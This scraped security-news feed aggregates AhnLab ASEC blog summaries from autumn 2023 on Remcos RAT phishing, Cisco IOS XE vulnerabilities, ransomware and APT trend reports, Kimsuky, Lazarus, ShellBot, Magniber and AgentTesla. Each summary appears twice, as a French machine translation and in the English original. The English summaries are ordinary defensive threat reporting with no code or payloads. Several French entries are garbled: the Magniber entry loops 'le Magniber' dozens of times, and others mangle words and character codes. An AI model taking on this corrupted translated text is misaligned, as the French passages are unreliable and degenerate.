AhnLab Security Emergency response Center (ASEC) found HWP documents that were embedded with OLE objects, targeting individuals in specific sectors such as the national defense and the press. The malware is presumed to be distributed mainly through download URLs or attachments in emails. The file names of the distributed documents are relevant to the areas of national defense, unification, education, and broadcasting, suggesting that the malware targets professionals involved in these areas. The HWP documents analyzed in this post largely... ]]> 2023-11-01T01:45:57+00:00 https://asec.ahnlab.com/en/58335/ www.secnews.physaphae.fr/article.php?IdArticle=8403838 False Malware,Threat None 3.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Emergency Response Center (ASEC) a découvert que les circonstances des logiciels malveillants à distance des remcos en cours de distribution par le biais d'une-mail déguisé en glissade.Comme le montre la figure 1, le rat Remcos identifié a été distribué sous un sujet par e-mail qui se lisait & # 8216; Il s'agit d'un document de confirmation pour votre transfert de paiement & # 8217;, tromper les lecteurs.Le fichier de cabine comprimé joint contient un fichier EXE (REMCOS RAT) déguisé avec une icône de fichier PDF comme illustré à la figure 2. Figure 1. Figure de messagerie de phishing ...

---

AhnLab Security Emergency response Center (ASEC) has discovered circumstances of the Remcos remote control malware being distributed through an email disguised as a payslip. As shown in Figure 1, the identified Remcos RAT was distributed under an email subject that read ‘This is a confirmation document for your payment transfer’, deceiving the readers. The attached compressed cab file contains an EXE file (Remcos RAT) disguised with a PDF file icon as shown in Figure 2. Figure 1. Phishing email Figure... ]]> 2023-10-30T04:58:37+00:00 https://asec.ahnlab.com/en/58195/ www.secnews.physaphae.fr/article.php?IdArticle=8402636 False Malware None 2.0000000000000000 AhnLab - Korean Security Firm aperçu ce mois-ci, Cisco a publié un avis de sécurité concernant deux vulnérabilités actuellement exploitées activement dans les attaques réelles: CVE CVE-2023-20198 et CVE-2023-20273.Ces vulnérabilités sont présentes dans la fonction d'interface utilisateur Web du logiciel Cisco iOS XE.La vulnérabilité CVE-2023-20198 permet à un acteur de menace non autorisé de créer un compte arbitraire avec des privilèges de niveau 15, qui est le plus haut niveau d'autorisation d'accès possible et de prendre le contrôle du système.La vulnérabilité CVE-2023-20273 permet une injection de commande qui permet d'écrire un contenu malveillant ...

---

Overview This month, Cisco released a security advisory regarding two vulnerabilities currently being actively exploited in actual attacks: CVE-2023-20198 and CVE-2023-20273. These vulnerabilities are present in the web UI feature of Cisco IOS XE Software. The CVE-2023-20198 vulnerability allows an unauthorized threat actor to create an arbitrary account with level 15 privileges, which is the highest level of access permission possible, and take control over the system. The CVE-2023-20273 vulnerability allows command injection which enables malicious content to be written... ]]> 2023-10-30T04:18:29+00:00 https://asec.ahnlab.com/en/58182/ www.secnews.physaphae.fr/article.php?IdArticle=8402637 False Vulnerability,Threat None 2.0000000000000000 AhnLab - Korean Security Firm Ce rapport fournit des statistiques sur le nombre de nouveaux échantillons de ransomware, des systèmes ciblés et des entreprises ciblées en août 2023, ainsi que des problèmes de ransomware notables en Corée et dans d'autres pays.Tendances clés 1) Tactiques de pression élargies des ransomwares sur les entreprises ciblées 2) Rhysida Ransomware Connection avec la vice Society 3) Monti Ransomware a introduit une nouvelle technique de chiffrement Linux Aug_Thereat Trend Rapport sur les statistiques des ransomwares et les principaux problèmes

---

This report provides statistics on the number of new ransomware samples, targeted systems, and targeted businesses in August 2023, as well as notable ransomware issues in Korea and other countries. Key Trends 1) CLOP ransomware expanded pressure tactics on targeted businesses 2) Rhysida ransomware connection with Vice Society 3) Monti ransomware introduced new Linux encryption technique Aug_Threat Trend Report on Ransomware Statistics and Major Issues ]]> 2023-10-23T02:24:33+00:00 https://asec.ahnlab.com/en/57944/ www.secnews.physaphae.fr/article.php?IdArticle=8399122 False Ransomware,Threat,Prediction None 2.0000000000000000 AhnLab - Korean Security Firm Ce rapport de tendance sur le Web Deep et le Web sombre d'août 2023 est sectionné en ransomware, forums & # & #38;Marchés noirs et acteurs de menace.Nous tenons à dire à l'avance qu'une partie du contenu n'a pas encore été confirmée comme vraie.1) Ransomware (1) Alphv (Blackcat) (2) Lockbit (3) NoEscape (4) Metaencryptor (5) Rhysida 2) Forum & # 38;Black Market (1) Le retour du voleur de raton laveur (2) Anonfiles a fermé (3) violation de données du site Web d'apprentissage des langues étrangères 3) ...

---

This trend report on the deep web and dark web of August 2023 is sectioned into Ransomware, Forums & Black Markets, and Threat Actors. We would like to state beforehand that some of the content has yet to be confirmed to be true. 1) Ransomware (1) ALPHV (BlackCat) (2) LockBit (3) NoEscape (4) MetaEncryptor (5) Rhysida 2) Forum & Black Market (1) The Return of Raccoon Stealer (2) Anonfiles Shut Down (3) Data Breach of Foreign Language Learning Website 3)... ]]> 2023-10-23T02:22:46+00:00 https://asec.ahnlab.com/en/57934/ www.secnews.physaphae.fr/article.php?IdArticle=8399123 False Ransomware,Data Breach,Threat,Prediction None 2.0000000000000000 AhnLab - Korean Security Firm août 2023 Problèmes majeurs sur les groupes de l'APT 1) Andariel 2) APT29 3) APT31 4) amer 5)Bronze Starlight 6) Callisto 7) Cardinbee 8) Typhoon de charbon de bois (Redhotel) 9) Terre estrie 10) Typhon de lin 11) Groundpeony 12) Chisel infâme 13) Kimsuky 14) Lazarus 15)Moustachedbouncher 16) Éléphant mystérieux (APT-K-47) 17) Nobelium (Blizzard de minuit) 18) Red Eyes (APT37) Aug_Thereat Trend Rapport sur les groupes APT

---

August 2023 Major Issues on APT Groups 1) Andariel 2) APT29 3) APT31 4) Bitter 5) Bronze Starlight 6) Callisto 7) Carderbee 8) Charcoal Typhoon (RedHotel) 9) Earth Estries 10) Flax Typhoon 11) GroundPeony 12) Infamous Chisel 13) Kimsuky 14) Lazarus 15) MoustachedBouncher 16) Mysterious Elephant (APT-K-47) 17) Nobelium (Midnight Blizzard) 18) Red Eyes (APT37) Aug_Threat Trend Report on APT Groups ]]> 2023-10-23T02:22:16+00:00 https://asec.ahnlab.com/en/57930/ www.secnews.physaphae.fr/article.php?IdArticle=8399124 False Threat,Prediction APT 38,APT 38,APT 29,APT 37,APT 31 3.0000000000000000 AhnLab - Korean Security Firm Les activités de Kimsuky Group & # 8217;Les activités d'autres types étaient relativement faibles.De plus, des échantillons de phishing ont été trouvés dans l'infrastructure connue pour la distribution de logiciels malveillants antérieurs (fleurs, randomquery et appleseed), et des échantillons de babyshark ont été découverts dans l'infrastructure RandomQuery.Cela suggère la probabilité de plusieurs types de logiciels malveillants en utilisant une seule infrastructure.Rapport de tendance AUG_TRÉTÉE sur le groupe Kimsuk

---

The Kimsuky group’s activities in August 2023 showed a notable surge in the BabyShark type, while the activities of other types were relatively low. Also, phishing samples were found in the infrastructure known for distributing previous malware (FlowerPower, RandomQuery, and AppleSeed), and BabyShark samples were discovered in the RandomQuery infrastructure. This suggests the likelihood of multiple types of malware utilizing a single infrastructure. Aug_Threat Trend Report on Kimsuky Group ]]> 2023-10-23T02:21:45+00:00 https://asec.ahnlab.com/en/57938/ www.secnews.physaphae.fr/article.php?IdArticle=8399125 False Malware,Threat,Prediction APT 43 3.0000000000000000 AhnLab - Korean Security Firm InfostEllers, qui volent les informations d'identification du compte utilisateur enregistrées dans les navigateurs Web ou les clients de messagerie, constituent la majorité des attaques ciblées ciblant les ciblage des attaquesutilisateurs généraux ou d'entreprise.Les informations connexes ont été partagées via le blog ASEC en décembre de l'année dernière.[1] Bien que la méthode de distribution des logiciels malveillants nommés diffère légèrement en fonction de leurs principales caractéristiques, les logiciels malveillants de type infoséaler utilisent généralement des sites malveillants déguisés en pages pour télécharger des programmes légitimes comme voie de distribution.Ils sont également activement distribués via des pièces jointes de spam ou MS ...

---

Infostealers, which steal user account credentials saved in web browsers or email clients, constitute the majority of attacks targeting general or corporate users. Related information was shared through the ASEC Blog in December of last year. [1] While the distribution method for the named malware differs slightly depending on their main features, Infostealer-type malware typically uses malicious sites disguised as pages for downloading legitimate programs as their distribution route. They are also actively distributed through spam email attachments or MS... ]]> 2023-10-18T05:55:43+00:00 https://asec.ahnlab.com/en/57883/ www.secnews.physaphae.fr/article.php?IdArticle=8397098 False Spam,Malware None 3.0000000000000000 AhnLab - Korean Security Firm Kimsuky, un groupe de menaces connu pour être soutenu par la Corée du Nord, est actif depuis 2013. Au début, ils ont attaqué les instituts de recherche liés à la Corée du Nord en Corée du Sud avant d'attaquer une agence d'énergie sud-coréenne en 2014. D'autres pays sont également devenus des cibles de leur attaque depuis 2017. [1] Le groupe lance généralement des attaques de phishing de lance contre la défense nationale, diplomatique diplomatique,, et les secteurs universitaires, les industries de la défense et des médias, ainsi que des organisations nationales.Leur objectif est d'exfiltrer les informations et la technologie internes ...

---

Kimsuky, a threat group known to be supported by North Korea, has been active since 2013. At first, they attacked North Korea-related research institutes in South Korea before attacking a South Korean energy agency in 2014. Other countries have also become targets of their attack since 2017. [1] The group usually launches spear phishing attacks on the national defense, diplomatic, and academic sectors, defense and media industries, as well as national organizations. Their goal is to exfiltrate internal information and technology... ]]> 2023-10-17T09:08:51+00:00 https://asec.ahnlab.com/en/57873/ www.secnews.physaphae.fr/article.php?IdArticle=8396631 False Threat APT 43 3.0000000000000000 AhnLab - Korean Security Firm Le groupe Lazare est un groupe de piratage connu pour être parrainé par l'État et mène activement des activités de piratageDans le monde entier pour le gain financier, le vol de données et d'autres fins.Un aperçu simplifié de l'attaque du trou d'arrosage du groupe Lazare qui a abusé de la vulnérabilité inisafée est la suivante: un lien malveillant a été inséré dans un article spécifique sur un site Web d'actualités.Par conséquent, les entreprises et les institutions qui ont cliqué sur cet article étaient ciblées pour le piratage.Les pirates ont exploité des sites Web coréens vulnérables avec C2 ...

---

The Lazarus group is a hacking group that is known to be state-sponsored and is actively conducting hacking activities worldwide for financial gain, data theft, and other purposes. A simplified overview of the Lazarus group’s watering hole attack that abused the INISAFE vulnerability is as follows: a malicious link was inserted within a specific article on a news website. Consequently, companies and institutions that clicked on this article were targeted for hacking. The hackers exploited vulnerable Korean websites with C2... ]]> 2023-10-17T00:55:09+00:00 https://asec.ahnlab.com/en/57736/ www.secnews.physaphae.fr/article.php?IdArticle=8396477 False Vulnerability APT 38 2.0000000000000000 AhnLab - Korean Security Firm aperçu1.Analyse de la porte dérobée de Volgmer….1.1.Version précoce de Volgmer …… .. 1.1.1.Analyse des compte-gouttes Volgmer …… .. 1.1.2.Analyse de la porte dérobée de Volgmer….1.2.Version ultérieure de Volgmer …… .. 1.2.1.Analyse de Volgmer Backdoor2.Analyse du téléchargeur Scout….2.1.DIGNES (Volgmer, Scout)….2.2.Analyse du téléchargeur Scout …… .. 2.2.1.Scout Downloader v1 …… .. 2.2.2.Scout Downloader V23.Conclusion Table des matières Le groupe de menaces de Lazarus parrainé par l'État a des dossiers d'activité qui remontent à 2009. Au début, leurs activités étaient principalement axées sur ...

---

Overview1. Analysis of Volgmer Backdoor…. 1.1. Early Version of Volgmer…….. 1.1.1. Analysis of Volgmer Dropper…….. 1.1.2. Analysis of Volgmer Backdoor…. 1.2. Later Version of Volgmer…….. 1.2.1. Analysis of Volgmer Backdoor2. Analysis of Scout Downloader…. 2.1. Droppers (Volgmer, Scout)…. 2.2. Analysis of Scout Downloader…….. 2.2.1. Scout Downloader v1…….. 2.2.2. Scout Downloader v23. Conclusion Table of Contents The seemingly state-sponsored Lazarus threat group has records of activity that date back to 2009. In the early days, their activities were mostly focused on... ]]> 2023-10-13T08:21:01+00:00 https://asec.ahnlab.com/en/57685/ www.secnews.physaphae.fr/article.php?IdArticle=8395055 False Threat APT 38 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Emergency Response Center (ASEC) a récemment découvert un changement dans la méthode de distribution du shellbot malveillant malveillant les logiciels malveillants shellbot malveillants (ASEC), qui est installé sur des serveurs Linux SSH mal gérés.Le flux global reste le même, mais l'URL de téléchargement utilisé par l'acteur de menace pour installer Shellbot est passé d'une adresse IP ordinaire à une valeur hexadécimale.1. cas passé d'évasion de détection d'URL.format, avec des acteurs de menace utilisant des adresses ...

---

AhnLab Security Emergency response Center (ASEC) has recently discovered a change in the distribution method of the ShellBot malware, which is being installed on poorly managed Linux SSH servers. The overall flow remains the same, but the download URL used by the threat actor to install ShellBot has changed from a regular IP address to a hexadecimal value. 1. Past Case of URL Detection Evasion Typically, IP addresses are used in the “dot-decimal notation” format, with threat actors using addresses... ]]> 2023-10-12T00:53:07+00:00 https://asec.ahnlab.com/en/57635/ www.secnews.physaphae.fr/article.php?IdArticle=8394548 False Malware,Threat None 3.0000000000000000 AhnLab - Korean Security Firm Grâce à un processus de surveillance continu, le centre d'intervention d'urgence de sécurité Ahnlab (ASEC) répond rapidement à Magniber, le Magniber, le Magniber, le Magniber, le Magniber, le Magniber, le Magniber, le Magniber, le Magniber, le Magniber, le Magniber, le Magniber, le Magniber, le Magniber, le Magnibre, le Magnibre, le Magniber, le Magnibre, le Magnibre, le Magnibre, le Magnibre, le Magnibre, le Magniber, le Magnibre, le Magniber, le Magnibre, le Magnibre, le Magniber, le MAGNIGHLes logiciels malveillants principaux qui sont activement distribués à l'aide de la méthode de typosquat qui abuse des fautes de frappe dans des adresses de domaine.Après que les règles de blocage de la technique d'injection utilisée par Magnber ont été distribuées, l'ASEC a publié un article sur les informations pertinentes le 10 août.Par la suite, le nombre de cas a diminué à mesure que le créateur de magnétique a effectué divers tests de dérivation de détection et, au 25 août, le ...

---

Through a continuous monitoring process, AhnLab Security Emergency response Center (ASEC) is swiftly responding to Magniber, the main malware that is actively being distributed using the typosquatting method which abuses typos in domain addresses. After the blocking rules of the injection technique used by Magniber were distributed, ASEC published a post about the relevant information on August 10th. Subsequently, the number of cases diminished as the creator of Magniber conducted various detection bypass tests, and as of August 25th, the... ]]> 2023-10-11T00:13:32+00:00 https://asec.ahnlab.com/en/57592/ www.secnews.physaphae.fr/article.php?IdArticle=8394144 False Ransomware,Malware None 2.0000000000000000 AhnLab - Korean Security Firm Récemment, il y a eu un taux de distribution élevé de logiciels malveillants en utilisant des certificats anormaux.Les logiciels malveillants se déguisent souvent avec des certificats normaux.Cependant, dans ce cas, les logiciels malveillants ont saisi les informations de certificat au hasard, le nom du sujet et les champs de noms émetteur ayant des chaînes inhabituellement longues.En conséquence, les informations sur le certificat ne sont pas visibles dans les systèmes d'exploitation Windows, et un outil ou une infrastructure spécifique est nécessaire pour inspecter la structure de ces certificats.Bien sûr, ces certificats échouent en vérification de signature depuis ...

---

Recently, there has been a high distribution rate of malware using abnormal certificates. Malware often disguise themselves with normal certificates. However, in this case, the malware entered the certificate information randomly, with the Subject Name and Issuer Name fields having unusually long strings. As a result, the certificate information is not visible in Windows operating systems, and a specific tool or infrastructure is required to inspect the structure of these certificates. Of course, these certificates fail in signature verification since... ]]> 2023-10-10T04:42:35+00:00 https://asec.ahnlab.com/en/57553/ www.secnews.physaphae.fr/article.php?IdArticle=8393473 False Malware,Tool None 3.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Emergency Response Center (ASEC) a repéré l'agenttesla infosterun fichier de chauve-souris malveillant.Lorsque le fichier BAT est exécuté, il utilise la méthode inférieure pour exécuter AgentTesla (EXE) sans créer le fichier sur le PC de l'utilisateur.Ce billet de blog fournira une explication du processus de distribution, de l'e-mail de spam au binaire final (AgentTesla), ainsi que des techniques connexes.La figure 1 montre le corps de l'e-mail de spam distribuant ...

---

AhnLab Security Emergency response Center (ASEC) spotted the AgentTesla Infostealer being distributed through an email in the form of a malicious BAT file. When the BAT file is executed, it employs the fileless method to run AgentTesla (EXE) without creating the file on the user’s PC. This blog post will provide an explanation of the distribution process, from the spam email to the final binary (AgentTesla), along with related techniques. Figure 1 shows the body of the spam email distributing... ]]> 2023-10-10T04:36:49+00:00 https://asec.ahnlab.com/en/57546/ www.secnews.physaphae.fr/article.php?IdArticle=8393474 False Spam None 3.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Emergency Response Center (ASEC) a identifié le processus par lequel les acteurs menaçaient installent des coïsUn système compromis est des ressources pour l'exploitation des crypto-monnaies.Ce message couvrira la façon dont le produit AHNLAB EDR détecte le processus d'installation des co -miners qui utilisent des ressources système pour l'exploitation de la crypto-monnaie.Figure 1. Exécution de la commande de l'acteur de menace & # 160;La figure 1 montre que l'acteur de menace a utilisé la même commande de manière cohérente sur le système infiltré.Il montre qu'un script PowerShell a été détecté en étant ...

---

AhnLab Security Emergency Response Center (ASEC) has identified the process through which threat actors install CoinMiners, which utilize a compromised system’s resources for cryptocurrency mining. This post will cover how the AhnLab EDR product detects the installation process of CoinMiners that use system resources for cryptocurrency mining. Figure 1. Execution of command from threat actor   Figure 1 shows that the threat actor used the same command consistently on the infiltrated system. It shows a PowerShell script was detected being... ]]> 2023-09-24T23:30:52+00:00 https://asec.ahnlab.com/en/57222/ www.secnews.physaphae.fr/article.php?IdArticle=8387417 False Threat None 3.0000000000000000